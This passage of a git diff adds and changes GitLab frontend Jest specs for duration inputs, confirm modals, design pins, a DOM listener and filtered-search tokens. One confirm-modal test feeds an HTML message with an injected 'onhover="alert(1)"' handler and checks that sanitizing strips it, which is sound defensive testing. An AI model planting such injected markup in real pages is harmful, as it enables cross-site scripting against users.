expect(textElement.value).toBe('2hr20min'); + expect(hiddenElement.value).toBe(MOCK_VALUE.toString()); + }); + + it('emits change event', () => { + expect(wrapper.emitted('change')).toEqual([[MOCK_VALUE]]); + }); + }); + + describe('when starting with a value and receiving empty input', () => { + beforeEach(() => { + createAndDispatch(MOCK_VALUE, ''); + }); + + it('updates hidden field', () => { + expect(textElement.value).toBe(''); + expect(hiddenElement.value).toBe(''); + }); + + it('emits change event', () => { + expect(wrapper.emitted('change')).toEqual([[null]]); + }); + }); + + describe('when starting with a value and receiving invalid input', () => { + beforeEach(() => { + createAndDispatch(MOCK_VALUE, 'gobbledygook'); + }); + + it('does not update hidden field', () => { + expect(textElement.value).toBe('gobbledygook'); + expect(hiddenElement.value).toBe(MOCK_VALUE.toString()); + }); + + it('does not emit change event', () => { + expect(wrapper.emitted('change')).toBeUndefined(); + }); + }); + }); + + describe('valid', () => { + describe('initial value', () => { + beforeEach(() => { + createComponent({ value: MOCK_VALUE }); + }); + + it('emits valid with initial value', () => { + expect(wrapper.emitted('valid')).toEqual([[{ valid: true, feedback: '' }]]); + expect(textElement.validity.valid).toBe(true); + expect(textElement.validity.customError).toBe(false); + expect(textElement.validationMessage).toBe(''); + expect(hiddenElement.validity.valid).toBe(true); + expect(hiddenElement.validity.customError).toBe(false); + expect(hiddenElement.validationMessage).toBe(''); + }); + + it('emits valid with user input', async () => { + textElement.value = '1m10s'; + textElement.dispatchEvent(new Event('input')); + await wrapper.vm.$nextTick(); + + expect(wrapper.emitted('valid')).toEqual([ + [{ valid: true, feedback: '' }], + [{ valid: true, feedback: '' }], + ]); + expect(textElement.validity.valid).toBe(true); + expect(textElement.validity.customError).toBe(false); + expect(textElement.validationMessage).toBe(''); + expect(hiddenElement.validity.valid).toBe(true); + expect(hiddenElement.validity.customError).toBe(false); + expect(hiddenElement.validationMessage).toBe(''); + + textElement.value = ''; + textElement.dispatchEvent(new Event('input')); + await wrapper.vm.$nextTick(); + + expect(wrapper.emitted('valid')).toEqual([ + [{ valid: true, feedback: '' }], + [{ valid: true, feedback: '' }], + [{ valid: null, feedback: '' }], + ]); + expect(textElement.validity.valid).toBe(true); + expect(textElement.validity.customError).toBe(false); + expect(textElement.validationMessage).toBe(''); + expect(hiddenElement.validity.valid).toBe(true); + expect(hiddenElement.validity.customError).toBe(false); + expect(hiddenElement.validationMessage).toBe(''); + }); + + it('emits invalid with user input', async () => { + textElement.value = 'gobbledygook'; + textElement.dispatchEvent(new Event('input')); + await wrapper.vm.$nextTick(); + + expect(wrapper.emitted('valid')).toEqual([ + [{ valid: true, feedback: '' }], + [{ valid: false, feedback: ChronicDurationInput.i18n.INVALID_INPUT_FEEDBACK }], + ]); + expect(textElement.validity.valid).toBe(false); + expect(textElement.validity.customError).toBe(true); + expect(textElement.validationMessage).toBe( + ChronicDurationInput.i18n.INVALID_INPUT_FEEDBACK, + ); + expect(hiddenElement.validity.valid).toBe(false); + expect(hiddenElement.validity.customError).toBe(true); + // Hidden elements do not have validationMessage + expect(hiddenElement.validationMessage).toBe(''); + }); + }); + + describe('no initial value', () => { + beforeEach(() => { + createComponent({ value: null }); + }); + + it('emits valid with no initial value', () => { + expect(wrapper.emitted('valid')).toEqual([[{ valid: null, feedback: '' }]]); + expect(textElement.validity.valid).toBe(true); + expect(textElement.validity.customError).toBe(false); + expect(textElement.validationMessage).toBe(''); + expect(hiddenElement.validity.valid).toBe(true); + expect(hiddenElement.validity.customError).toBe(false); + expect(hiddenElement.validationMessage).toBe(''); + }); + + it('emits valid with updated value', async () => { + wrapper.setProps({ value: MOCK_VALUE }); + await wrapper.vm.$nextTick(); + + expect(wrapper.emitted('valid')).toEqual([ + [{ valid: null, feedback: '' }], + [{ valid: true, feedback: '' }], + ]); + expect(textElement.validity.valid).toBe(true); + expect(textElement.validity.customError).toBe(false); + expect(textElement.validationMessage).toBe(''); + expect(hiddenElement.validity.valid).toBe(true); + expect(hiddenElement.validity.customError).toBe(false); + expect(hiddenElement.validationMessage).toBe(''); + }); + }); + + describe('decimal input', () => { + describe('when integerRequired is false', () => { + beforeEach(() => { + createComponent({ value: null, integerRequired: false }); + }); + + it('emits valid when input is integer', async () => { + textElement.value = '2hr20min'; + textElement.dispatchEvent(new Event('input')); + await wrapper.vm.$nextTick(); + + expect(wrapper.emitted('change')).toEqual([[MOCK_VALUE]]); + expect(wrapper.emitted('valid')).toEqual([ + [{ valid: null, feedback: '' }], + [{ valid: true, feedback: '' }], + ]); + expect(textElement.validity.valid).toBe(true); + expect(textElement.validity.customError).toBe(false); + expect(textElement.validationMessage).toBe(''); + expect(hiddenElement.validity.valid).toBe(true); + expect(hiddenElement.validity.customError).toBe(false); + expect(hiddenElement.validationMessage).toBe(''); + }); + + it('emits valid when input is decimal', async () => { + textElement.value = '1.5s'; + textElement.dispatchEvent(new Event('input')); + await wrapper.vm.$nextTick(); + + expect(wrapper.emitted('change')).toEqual([[1.5]]); + expect(wrapper.emitted('valid')).toEqual([ + [{ valid: null, feedback: '' }], + [{ valid: true, feedback: '' }], + ]); + expect(textElement.validity.valid).toBe(true); + expect(textElement.validity.customError).toBe(false); + expect(textElement.validationMessage).toBe(''); + expect(hiddenElement.validity.valid).toBe(true); + expect(hiddenElement.validity.customError).toBe(false); + expect(hiddenElement.validationMessage).toBe(''); + }); + }); + + describe('when integerRequired is unspecified', () => { + beforeEach(() => { + createComponent({ value: null }); + }); + + it('emits valid when input is integer', async () => { + textElement.value = '2hr20min'; + textElement.dispatchEvent(new Event('input')); + await wrapper.vm.$nextTick(); + + expect(wrapper.emitted('change')).toEqual([[MOCK_VALUE]]); + expect(wrapper.emitted('valid')).toEqual([ + [{ valid: null, feedback: '' }], + [{ valid: true, feedback: '' }], + ]); + expect(textElement.validity.valid).toBe(true); + expect(textElement.validity.customError).toBe(false); + expect(textElement.validationMessage).toBe(''); + expect(hiddenElement.validity.valid).toBe(true); + expect(hiddenElement.validity.customError).toBe(false); + expect(hiddenElement.validationMessage).toBe(''); + }); + + it('emits invalid when input is decimal', async () => { + textElement.value = '1.5s'; + textElement.dispatchEvent(new Event('input')); + await wrapper.vm.$nextTick(); + + expect(wrapper.emitted('change')).toBeUndefined(); + expect(wrapper.emitted('valid')).toEqual([ + [{ valid: null, feedback: '' }], + [ + { + valid: false, + feedback: ChronicDurationInput.i18n.INVALID_DECIMAL_FEEDBACK, + }, + ], + ]); + expect(textElement.validity.valid).toBe(false); + expect(textElement.validity.customError).toBe(true); + expect(textElement.validationMessage).toBe( + ChronicDurationInput.i18n.INVALID_DECIMAL_FEEDBACK, + ); + expect(hiddenElement.validity.valid).toBe(false); + expect(hiddenElement.validity.customError).toBe(true); + // Hidden elements do not have validationMessage + expect(hiddenElement.validationMessage).toBe(''); + }); + }); + }); + }); + + describe('v-model', () => { + beforeEach(() => { + wrapper = mount({ + data() { + return { value: 1 * 60 + 10 }; + }, + components: { ChronicDurationInput }, + template: '<div><chronic-duration-input v-model="value"/></div>', + }); + findComponents(); + }); + + describe('value', () => { + it('passes initial prop via v-model', () => { + expect(textElement.value).toBe('1 min 10 secs'); + expect(hiddenElement.value).toBe((1 * 60 + 10).toString()); + }); + + it('passes updated prop via v-model', async () => { + wrapper.setData({ value: MOCK_VALUE }); + await wrapper.vm.$nextTick(); + + expect(textElement.value).toBe('2 hrs 20 mins'); + expect(hiddenElement.value).toBe(MOCK_VALUE.toString()); + }); + }); + + describe('change', () => { + it('passes user input to parent via v-model', async () => { + textElement.value = '2hr20min'; + textElement.dispatchEvent(new Event('input')); + await wrapper.vm.$nextTick(); + + expect(wrapper.findComponent(ChronicDurationInput).props('value')).toBe(MOCK_VALUE); + expect(textElement.value).toBe('2hr20min'); + expect(hiddenElement.value).toBe(MOCK_VALUE.toString()); + }); + }); + }); + + describe('name', () => { + beforeEach(() => { + createComponent({ name: 'myInput' }); + }); + + it('sets name of hidden field', () => { + expect(hiddenElement.name).toBe('myInput'); + }); + + it('does not set name of text field', () => { + expect(textElement.name).toBe(''); + }); + }); + + describe('form submission', () => { + beforeEach(() => { + wrapper = mount({ + template: `<form data-testid="myForm"><chronic-duration-input name="myInput" :value="${MOCK_VALUE}"/></form>`, + components: { + ChronicDurationInput, + }, + }); + findComponents(); + }); + + it('creates form data with initial value', () => { + const formData = new FormData(wrapper.find('[data-testid=myForm]').element); + const iter = formData.entries(); + + expect(iter.next()).toEqual({ + value: ['myInput', MOCK_VALUE.toString()], + done: false, + }); + expect(iter.next()).toEqual({ value: undefined, done: true }); + }); + + it('creates form data with user-specified value', async () => { + textElement.value = '1m10s'; + textElement.dispatchEvent(new Event('input')); + await wrapper.vm.$nextTick(); + + const formData = new FormData(wrapper.find('[data-testid=myForm]').element); + const iter = formData.entries(); + + expect(iter.next()).toEqual({ + value: ['myInput', (1 * 60 + 10).toString()], + done: false, + }); + expect(iter.next()).toEqual({ value: undefined, done: true }); + }); + }); +}); diff --git a/spec/frontend/vue_shared/components/clipboard_button_spec.js b/spec/frontend/vue_shared/components/clipboard_button_spec.js index ab4008484e5..33445923a49 100644 --- a/spec/frontend/vue_shared/components/clipboard_button_spec.js +++ b/spec/frontend/vue_shared/components/clipboard_button_spec.js @@ -89,6 +89,16 @@ describe('clipboard button', () => { expect(onClick).toHaveBeenCalled(); }); + it('passes the category and variant props to the GlButton', () => { + const category = 'tertiary'; + const variant = 'confirm'; + + createWrapper({ title: '', text: '', category, variant }); + + expect(findButton().props('category')).toBe(category); + expect(findButton().props('variant')).toBe(variant); + }); + describe('integration', () => { it('actually copies to clipboard', () => { initCopyToClipboard(); diff --git a/spec/frontend/vue_shared/components/confirm_danger/confirm_danger_spec.js b/spec/frontend/vue_shared/components/confirm_danger/confirm_danger_spec.js index 220f897c035..af7f85769aa 100644 --- a/spec/frontend/vue_shared/components/confirm_danger/confirm_danger_spec.js +++ b/spec/frontend/vue_shared/components/confirm_danger/confirm_danger_spec.js @@ -9,6 +9,7 @@ describe('Confirm Danger Modal', () => { const phrase = 'En Taro Adun'; const buttonText = 'Click me!'; + const buttonClass = 'gl-w-full'; const modalId = CONFIRM_DANGER_MODAL_ID; const findBtn = () => wrapper.findComponent(GlButton); @@ -19,6 +20,7 @@ describe('Confirm Danger Modal', () => { shallowMountExtended(ConfirmDanger, { propsData: { buttonText, + buttonClass, phrase, ...props, }, @@ -51,6 +53,10 @@ describe('Confirm Danger Modal', () => { expect(findBtn().attributes('disabled')).toBe('true'); }); + it('passes `buttonClass` prop to button', () => { + expect(findBtn().classes()).toContain(buttonClass); + }); + it('will emit `confirm` when the modal confirms', () => { expect(wrapper.emitted('confirm')).toBeUndefined(); diff --git a/spec/frontend/vue_shared/components/confirm_modal_spec.js b/spec/frontend/vue_shared/components/confirm_modal_spec.js index db8d0674121..3ca1c943398 100644 --- a/spec/frontend/vue_shared/components/confirm_modal_spec.js +++ b/spec/frontend/vue_shared/components/confirm_modal_spec.js @@ -1,6 +1,9 @@ import { shallowMount } from '@vue/test-utils'; +import { merge } from 'lodash'; import { TEST_HOST } from 'helpers/test_constants'; +import eventHub, { EVENT_OPEN_CONFIRM_MODAL } from '~/vue_shared/components/confirm_modal_eventhub'; import ConfirmModal from '~/vue_shared/components/confirm_modal.vue'; +import DomElementListener from '~/vue_shared/components/dom_element_listener.vue'; jest.mock('~/lib/utils/csrf', () => ({ token: 'test-csrf-token' })); @@ -54,12 +57,50 @@ describe('vue_shared/components/confirm_modal', () => { findForm() .findAll('input') .wrappers.map((x) => ({ name: x.attributes('name'), value: x.attributes('value') })); + const findDomElementListener = () => wrapper.find(DomElementListener); + const triggerOpenWithEventHub = (modalData) => { + eventHub.$emit(EVENT_OPEN_CONFIRM_MODAL, modalData); + }; + const triggerOpenWithDomListener = (modalData) => { + const element = document.createElement('button'); + + element.dataset.path = modalData.path; + element.dataset.method = modalData.method; + element.dataset.modalAttributes = JSON.stringify(modalData.modalAttributes); + + findDomElementListener().vm.$emit('click', { + preventDefault: jest.fn(), + currentTarget: element, + }); + }; + + describe('default', () => { + beforeEach(() => { + createComponent(); + }); + + it('renders empty GlModal', () => { + expect(findModal().props()).toEqual({}); + }); + + it('renders form missing values', () => { + expect(findForm().attributes('action')).toBe(''); + expect(findFormData()).toEqual([ + { name: '_method', value: undefined }, + { name: 'authenticity_token', value: 'test-csrf-token' }, + ]); + }); + }); describe('template', () => { - describe('when modal data is set', () => { + describe.each` + desc | trigger + ${'when opened from eventhub'} | ${triggerOpenWithEventHub} + ${'when opened from dom listener'} | ${triggerOpenWithDomListener} + `('$desc', ({ trigger }) => { beforeEach(() => { createComponent(); - wrapper.vm.modalAttributes = MOCK_MODAL_DATA.modalAttributes; + trigger(MOCK_MODAL_DATA); }); it('renders GlModal with data', () => { @@ -71,6 +112,14 @@ describe('vue_shared/components/confirm_modal', () => { }), ); }); + + it('renders form', () => { + expect(findForm().attributes('action')).toBe(MOCK_MODAL_DATA.path); + expect(findFormData()).toEqual([ + { name: '_method', value: MOCK_MODAL_DATA.method }, + { name: 'authenticity_token', value: 'test-csrf-token' }, + ]); + }); }); describe.each` @@ -79,11 +128,10 @@ describe('vue_shared/components/confirm_modal', () => { ${'when message has html'} | ${{ messageHtml: '<p>Header</p><ul onhover="alert(1)"><li>First</li></ul>' }} | ${'<p>Header</p><ul><li>First</li></ul>'} `('$desc', ({ attrs, expectation }) => { beforeEach(() => { + const modalData = merge({ ...MOCK_MODAL_DATA }, { modalAttributes: attrs }); + createComponent(); - wrapper.vm.modalAttributes = { - ...MOCK_MODAL_DATA.modalAttributes, - ...attrs, - }; + triggerOpenWithEventHub(modalData); }); it('renders message', () => { @@ -96,8 +144,7 @@ describe('vue_shared/components/confirm_modal', () => { describe('submitModal', () => { beforeEach(() => { createComponent(); - wrapper.vm.path = MOCK_MODAL_DATA.path; - wrapper.vm.method = MOCK_MODAL_DATA.method; + triggerOpenWithEventHub(MOCK_MODAL_DATA); }); it('does not submit form', () => { diff --git a/spec/frontend/vue_shared/components/design_management/__snapshots__/design_note_pin_spec.js.snap b/spec/frontend/vue_shared/components/design_management/__snapshots__/design_note_pin_spec.js.snap new file mode 100644 index 00000000000..eb0adb0bebd --- /dev/null +++ b/spec/frontend/vue_shared/components/design_management/__snapshots__/design_note_pin_spec.js.snap @@ -0,0 +1,55 @@ +// Jest Snapshot v1, https://goo.gl/fbAQLP + +exports[`Design note pin component should match the snapshot of note with index 1`] = ` +<button + aria-label="Comment '1' position" + class="gl-display-flex gl-align-items-center gl-justify-content-center gl-font-sm js-image-badge design-note-pin gl-absolute" + style="left: 10px; top: 10px;" + type="button" +> + + 1 + +</button> +`; + +exports[`Design note pin component should match the snapshot of note without index 1`] = ` +<button + aria-label="Comment form position" + class="gl-display-flex gl-align-items-center gl-justify-content-center gl-font-sm btn-transparent comment-indicator gl-absolute" + style="left: 10px; top: 10px;" + type="button" +> + <gl-icon-stub + name="image-comment-dark" + size="24" + /> +</button> +`; + +exports[`Design note pin component should match the snapshot when pin is resolved 1`] = ` +<button + aria-label="Comment form position" + class="gl-display-flex gl-align-items-center gl-justify-content-center gl-font-sm btn-transparent comment-indicator resolved gl-absolute" + style="left: 10px; top: 10px;" + type="button" +> + <gl-icon-stub + name="image-comment-dark" + size="24" + /> +</button> +`; + +exports[`Design note pin component should match the snapshot when position is absent 1`] = ` +<button + aria-label="Comment form position" + class="gl-display-flex gl-align-items-center gl-justify-content-center gl-font-sm btn-transparent comment-indicator" + type="button" +> + <gl-icon-stub + name="image-comment-dark" + size="24" + /> +</button> +`; diff --git a/spec/frontend/design_management/components/design_note_pin_spec.js b/spec/frontend/vue_shared/components/design_management/design_note_pin_spec.js index a6219923aca..984a28c93d6 100644 --- a/spec/frontend/design_management/components/design_note_pin_spec.js +++ b/spec/frontend/vue_shared/components/design_management/design_note_pin_spec.js @@ -1,5 +1,5 @@ import { shallowMount } from '@vue/test-utils'; -import DesignNotePin from '~/design_management/components/design_note_pin.vue'; +import DesignNotePin from '~/vue_shared/components/design_management/design_note_pin.vue'; describe('Design note pin component', () => { let wrapper; @@ -29,4 +29,14 @@ describe('Design note pin component', () => { createComponent({ label: 1 }); expect(wrapper.element).toMatchSnapshot(); }); + + it('should match the snapshot when pin is resolved', () => { + createComponent({ isResolved: true }); + expect(wrapper.element).toMatchSnapshot(); + }); + + it('should match the snapshot when position is absent', () => { + createComponent({ position: null }); + expect(wrapper.element).toMatchSnapshot(); + }); }); diff --git a/spec/frontend/vue_shared/components/diff_viewer/viewers/renamed_spec.js b/spec/frontend/vue_shared/components/diff_viewer/viewers/renamed_spec.js index 9f433816b34..b8d3cbebe16 100644 --- a/spec/frontend/vue_shared/components/diff_viewer/viewers/renamed_spec.js +++ b/spec/frontend/vue_shared/components/diff_viewer/viewers/renamed_spec.js @@ -1,4 +1,5 @@ -import { createLocalVue, shallowMount, mount } from '@vue/test-utils'; +import { shallowMount, mount } from '@vue/test-utils'; +import Vue from 'vue'; import Vuex from 'vuex'; import { TRANSITION_LOAD_START, @@ -11,15 +12,13 @@ import { } from '~/diffs/constants'; import Renamed from '~/vue_shared/components/diff_viewer/viewers/renamed.vue'; -const localVue = createLocalVue(); -localVue.use(Vuex); +Vue.use(Vuex); function createRenamedComponent({ props = {}, store = new Vuex.Store({}), deep = false }) { const mnt = deep ? mount : shallowMount; return mnt(Renamed, { propsData: { ...props }, - localVue, store, }); } diff --git a/spec/frontend/vue_shared/components/dismissible_alert_spec.js b/spec/frontend/vue_shared/components/dismissible_alert_spec.js index fcd004d35a7..879d4aba441 100644 --- a/spec/frontend/vue_shared/components/dismissible_alert_spec.js +++ b/spec/frontend/vue_shared/components/dismissible_alert_spec.js @@ -43,6 +43,10 @@ describe('vue_shared/components/dismissible_alert', () => { it('hides the alert', () => { expect(findAlert().exists()).toBe(false); }); + + it('emmits alertDismissed', () => { + expect(wrapper.emitted('alertDismissed')).toBeTruthy(); + }); }); }); diff --git a/spec/frontend/vue_shared/components/dom_element_listener_spec.js b/spec/frontend/vue_shared/components/dom_element_listener_spec.js new file mode 100644 index 00000000000..a848c34b7ce --- /dev/null +++ b/spec/frontend/vue_shared/components/dom_element_listener_spec.js @@ -0,0 +1,116 @@ +import { mount } from '@vue/test-utils'; +import { setHTMLFixture } from 'helpers/fixtures'; +import DomElementListener from '~/vue_shared/components/dom_element_listener.vue'; + +const DEFAULT_SLOT_CONTENT = 'Default slot content'; +const SELECTOR = '.js-test-include'; +const HTML = ` +<div> + <button class="js-test-include" data-testid="lorem">Lorem</button> + <button class="js-test-include" data-testid="ipsum">Ipsum</button> + <button data-testid="hello">Hello</a> +</div> +`; + +describe('~/vue_shared/components/dom_element_listener.vue', () => { + let wrapper; + let spies; + + const createComponent = () => { + wrapper = mount(DomElementListener, { + propsData: { + selector: SELECTOR, + }, + listeners: spies, + slots: { + default: DEFAULT_SLOT_CONTENT, + }, + }); + }; + + const findElement = (testId) => document.querySelector(`[data-testid="${testId}"]`); + const spiesCallCount = () => + Object.values(spies) + .map((x) => x.mock.calls.length) + .reduce((a, b) => a + b); + + beforeEach(() => { + setHTMLFixture(HTML); + spies = { + click: jest.fn(), + focus: jest.fn(), + }; + }); + + afterEach(() => { + wrapper.destroy(); + }); + + describe('default', () => { + beforeEach(() => { + createComponent(); + }); + + it('renders default slot', () => { + expect(wrapper.text()).toBe(DEFAULT_SLOT_CONTENT); + }); + + it('does not initially trigger listeners', () => { + expect(spiesCallCount()).toBe(0); + }); + + describe.each` + event | testId + ${'click'} | ${'lorem'} + ${'focus'} | ${'ipsum'} + `( + 'when matching element triggers event (testId=$testId, event=$event)', + ({ event, testId }) => { + beforeEach(() => { + findElement(testId).dispatchEvent(new Event(event)); + }); + + it('triggers listener', () => { + expect(spiesCallCount()).toBe(1); + expect(spies[event]).toHaveBeenCalledWith(expect.any(Event)); + expect(spies[event]).toHaveBeenCalledWith( + expect.objectContaining({ + target: findElement(testId), + }), + ); + }); + }, + ); + + describe.each` + desc | event | testId + ${'when non-matching element triggers event'} | ${'click'} | ${'hello'} + ${'when matching element triggers unlistened event'} | ${'hover'} | ${'lorem'} + `('$desc', ({ event, testId }) => { + beforeEach(() => { + findElement(testId).dispatchEvent(new Event(event)); + }); + + it('does not trigger listeners', () => { + expect(spiesCallCount()).toBe(0); + }); + }); + }); + + describe('after destroyed', () => { + beforeEach(() => { + createComponent(); + wrapper.destroy(); + }); + + describe('when matching element triggers event', () => { + beforeEach(() => { + findElement('lorem').dispatchEvent(new Event('click')); + }); + + it('does not trigger any listeners', () => { + expect(spiesCallCount()).toBe(0); + }); + }); + }); +}); diff --git a/spec/frontend/vue_shared/components/file_icon_spec.js b/spec/frontend/vue_shared/components/file_icon_spec.js index c10663f6c14..b0e623520a8 100644 --- a/spec/frontend/vue_shared/components/file_icon_spec.js +++ b/spec/frontend/vue_shared/components/file_icon_spec.js @@ -34,7 +34,7 @@ describe('File Icon component', () => { it.each` fileName | iconName - ${'test.js'} | ${'javascript'} + ${'index.js'} | ${'javascript'} ${'test.png'} | ${'image'} ${'test.PNG'} | ${'image'} ${'.npmrc'} | ${'npm'} diff --git a/spec/frontend/vue_shared/components/filtered_search_bar/mock_data.js b/spec/frontend/vue_shared/components/filtered_search_bar/mock_data.js index 238c5d16db5..e3e2ef5610d 100644 --- a/spec/frontend/vue_shared/components/filtered_search_bar/mock_data.js +++ b/spec/frontend/vue_shared/components/filtered_search_bar/mock_data.js @@ -5,12 +5,9 @@ import { OPERATOR_IS_ONLY } from '~/vue_shared/components/filtered_search_bar/co import AuthorToken from '~/vue_shared/components/filtered_search_bar/tokens/author_token.vue'; import BranchToken from '~/vue_shared/components/filtered_search_bar/tokens/branch_token.vue'; import EmojiToken from '~/vue_shared/components/filtered_search_bar/tokens/emoji_token.vue'; -import EpicToken from '~/vue_shared/components/filtered_search_bar/tokens/epic_token.vue'; -import IterationToken from '~/vue_shared/components/filtered_search_bar/tokens/iteration_token.vue'; import LabelToken from '~/vue_shared/components/filtered_search_bar/tokens/label_token.vue'; import MilestoneToken from '~/vue_shared/components/filtered_search_bar/tokens/milestone_token.vue'; import ReleaseToken from '~/vue_shared/components/filtered_search_bar/tokens/release_token.vue'; -import WeightToken from '~/vue_shared/components/filtered_search_bar/tokens/weight_token.vue'; export const mockAuthor1 = { id: 1, @@ -65,11 +62,6 @@ export const mockMilestones = [ mockEscapedMilestone, ]; -export const mockEpics = [ - { iid: 1, id: 1, title: 'Foo', group_full_path: 'gitlab-org' }, - { iid: 2, id: 2, title: 'Bar', group_full_path: 'gitlab-org/design' }, -]; - export const mockEmoji1 = { name: 'thumbsup', }; @@ -102,27 +94,6 @@ export const mockAuthorToken = { fetchAuthors: Api.projectUsers.bind(Api), }; -export const mockIterationToken = { - type: 'iteration', - icon: 'iteration', - title: 'Iteration', - unique: true, - token: IterationToken, - fetchIterations: () => Promise.resolve(), -}; - -export const mockIterations = [ - { - id: 1, - title: 'Iteration 1', - startDate: '2021-11-05', - dueDate: '2021-11-10', - iterationCadence: { - title: 'Cadence 1', - }, - }, -]; - export const mockLabelToken = { type: 'label_name', icon: 'labels', @@ -153,73 +124,6 @@ export const mockReleaseToken = { fetchReleases: () => Promise.resolve(), }; -export const mockEpicToken = { - type: 'epic_iid', - icon: 'clock', - title: 'Epic', - unique: true, - symbol: '&', - token: EpicToken, - operators: OPERATOR_IS_ONLY, - idProperty: 'iid', - fullPath: 'gitlab-org', -}; - -export const mockEpicNode1 = { - __typename: 'Epic', - parent: null, - id: 'gid://gitlab/Epic/40', - iid: '2', - title: 'Marketing epic', - description: 'Mock epic description', - state: 'opened', - startDate: '2017-12-25', - dueDate: '2018-02-15', - webUrl: 'http://gdk.test:3000/groups/gitlab-org/marketing/-/epics/1', - hasChildren: false, - hasParent: false, - confidential: false, -}; - -export const mockEpicNode2 = { - __typename: 'Epic', - parent: null, - id: 'gid://gitlab/Epic/41', - iid: '3', - title: 'Another marketing', - startDate: '2017-12-26', - dueDate: '2018-03-10', - state: 'opened', - webUrl: 'http://gdk.test:3000/groups/gitlab-org/marketing/-/epics/2', -}; - -export const mockGroupEpicsQueryResponse = { - data: { - group: { - id: 'gid://gitlab/Group/1', - name: 'Gitlab Org', - epics: { - edges: [ - { - node: { - ...mockEpicNode1, - }, - __typename: 'EpicEdge', - }, - { - node: { - ...mockEpicNode2, - }, - __typename: 'EpicEdge', - }, - ], - __typename: 'EpicConnection', - }, - __typename: 'Group', - }, - }, -}; - export const mockReactionEmojiToken = { type: 'my_reaction_emoji', icon: 'thumb-up', @@ -243,14 +147,6 @@ export const mockMembershipToken = { ], }; -export const mockWeightToken = { - type: 'weight', - icon: 'weight', - title: 'Weight', - unique: true, - token: WeightToken, -}; - export const mockMembershipTokenOptionsWithoutTitles = { ...mockMembershipToken, options: [{ value: 'exclude' }, { value: 'only' }], diff --git a/spec/frontend/vue_shared/components/filtered_search_bar/tokens/base_token_spec.js b/spec/frontend/vue_shared/components/filtered_search_bar/tokens/base_token_spec.js index f9ce0338d2f..84f0151d9db 100644 --- a/spec/frontend/vue_shared/components/filtered_search_bar/tokens/base_token_spec.js +++ b/spec/frontend/vue_shared/components/filtered_search_bar/tokens/base_token_spec.js @@ -14,7 +14,13 @@ import BaseToken from '~/vue_shared/components/filtered_search_bar/tokens/base_t import { mockLabelToken } from '../mock_data'; -jest.mock('~/vue_shared/components/filtered_search_bar/filtered_search_utils'); +jest.mock('~/vue_shared/components/filtered_search_bar/filtered_search_utils', () => ({ + getRecentlyUsedSuggestions: jest.fn(), + setTokenValueToRecentlyUsed: jest.fn(), + stripQuotes: jest.requireActual( + '~/vue_shared/components/filtered_search_bar/filtered_search_utils', + ).stripQuotes, +})); const mockStorageKey = 'recent-tokens-label_name'; @@ -46,13 +52,13 @@ const defaultSlots = { }; const mockProps = { - config: mockLabelToken, + config: { ...mockLabelToken, recentSuggestionsStorageKey: mockStorageKey }, value: { data: '' }, active: false, suggestions: [], suggestionsLoading: false, defaultSuggestions: DEFAULT_NONE_ANY, - recentSuggestionsStorageKey: mockStorageKey, + getActiveTokenValue: (labels, data) => labels.find((label) => label.title === data), }; function createComponent({ @@ -152,30 +158,22 @@ describe('BaseToken', () => { describe('methods', () => { describe('handleTokenValueSelected', () => { - it('calls `setTokenValueToRecentlyUsed` when `recentSuggestionsStorageKey` is defined', () => { - const mockTokenValue = { - id: 1, - title: 'Foo', - }; + const mockTokenValue = mockLabels[0]; - wrapper.vm.handleTokenValueSelected(mockTokenValue); + it('calls `setTokenValueToRecentlyUsed` when `recentSuggestionsStorageKey` is defined', () => { + wrapper.vm.handleTokenValueSelected(mockTokenValue.title); expect(setTokenValueToRecentlyUsed).toHaveBeenCalledWith(mockStorageKey, mockTokenValue); }); it('does not add token from preloadedSuggestions', async () => { - const mockTokenValue = { - id: 1, - title: 'Foo', - }; - wrapper.setProps({ preloadedSuggestions: [mockTokenValue], }); await wrapper.vm.$nextTick(); - wrapper.vm.handleTokenValueSelected(mockTokenValue); + wrapper.vm.handleTokenValueSelected(mockTokenValue.title); expect(setTokenValueToRecentlyUsed).not.toHaveBeenCalled(); }); @@ -190,7 +188,7 @@ describe('BaseToken', () => { const glFilteredSearchToken = wrapperWithNoStubs.find(GlFilteredSearchToken); expect(glFilteredSearchToken.exists()).toBe(true); - expect(glFilteredSearchToken.props('config')).toBe(mockLabelToken); + expect(glFilteredSearchToken.props('config')).toEqual(mockProps.config); wrapperWithNoStubs.destroy(); }); @@ -239,6 +237,7 @@ describe('BaseToken', () => { stubs: { Portal: true }, }); }); + it('emits `fetch-suggestions` event on component after a delay when component emits `input` event', async () => { jest.useFakeTimers(); @@ -250,6 +249,32 @@ describe('BaseToken', () => { expect(wrapperWithNoStubs.emitted('fetch-suggestions')).toBeTruthy(); expect(wrapperWithNoStubs.emitted('fetch-suggestions')[2]).toEqual(['foo']); }); + + describe('when search is started with a quote', () => { + it('emits `fetch-suggestions` with filtered value', async () => { + jest.useFakeTimers(); + + wrapperWithNoStubs.find(GlFilteredSearchToken).vm.$emit('input', { data: '"foo' }); + await wrapperWithNoStubs.vm.$nextTick(); + + jest.runAllTimers(); + + expect(wrapperWithNoStubs.emitted('fetch-suggestions')[2]).toEqual(['foo']); + }); + }); + + describe('when search starts and ends with a quote', () => { + it('emits `fetch-suggestions` with filtered value', async () => { + jest.useFakeTimers(); + + wrapperWithNoStubs.find(GlFilteredSearchToken).vm.$emit('input', { data: '"foo"' }); + await wrapperWithNoStubs.vm.$nextTick(); + + jest.runAllTimers(); + + expect(wrapperWithNoStubs.emitted('fetch-suggestions')[2]).toEqual(['foo']); + }); + }); }); }); }); diff --git a/spec/frontend/vue_shared/components/filtered_search_bar/tokens/epic_token_spec.js b/spec/frontend/vue_shared/components/filtered_search_bar/tokens/epic_token_spec.js deleted file mode 100644 index 6ee5d50d396..00000000000 --- a/spec/frontend/vue_shared/components/filtered_search_bar/tokens/epic_token_spec.js +++ /dev/null @@ -1,169 +0,0 @@ -import { GlFilteredSearchTokenSegment } from '@gitlab/ui'; -import { mount } from '@vue/test-utils'; -import MockAdapter from 'axios-mock-adapter'; -import Vue from 'vue'; -import VueApollo from 'vue-apollo'; -import createMockApollo from 'helpers/mock_apollo_helper'; -import waitForPromises from 'helpers/wait_for_promises'; -import createFlash from '~/flash'; -import axios from '~/lib/utils/axios_utils'; - -import searchEpicsQuery from '~/vue_shared/components/filtered_search_bar/queries/search_epics.query.graphql'; -import EpicToken from '~/vue_shared/components/filtered_search_bar/tokens/epic_token.vue'; -import BaseToken from '~/vue_shared/components/filtered_search_bar/tokens/base_token.vue'; - -import { mockEpicToken, mockEpics, mockGroupEpicsQueryResponse } from '../mock_data'; - -jest.mock('~/flash'); -Vue.use(VueApollo); - -const defaultStubs = { - Portal: true, - GlFilteredSearchSuggestionList: { - template: 